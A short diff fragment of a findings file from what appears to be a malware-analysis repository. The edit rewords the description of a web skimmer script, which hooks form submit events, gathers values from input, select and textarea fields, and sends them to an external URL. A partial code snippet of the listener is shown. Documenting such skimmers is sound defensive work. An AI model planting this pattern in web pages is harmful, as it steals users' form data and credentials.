dimeko/malsmug/findings.md

         }, externURLKeys);
     });
     ```

-- Initializes listener on event `submit`: this enables the attacker to trigger actions on form submittions.
-Specifically, the script collects the values from `input`, `select` and `textarea` elements and sends them to the external url "https://something.refreshment.ltd/send"
+- Initializes a listener on the `submit` event: This enables the attacker to trigger actions on form submissions.
+Specifically, the script collects the values from `input`, `select`, and `textarea` elements and sends them to the external URL `"https://something.refreshment.ltd/send"`.
     ```javascript
     document.addEventListener("submit", function (e) {
         e.preventDefault();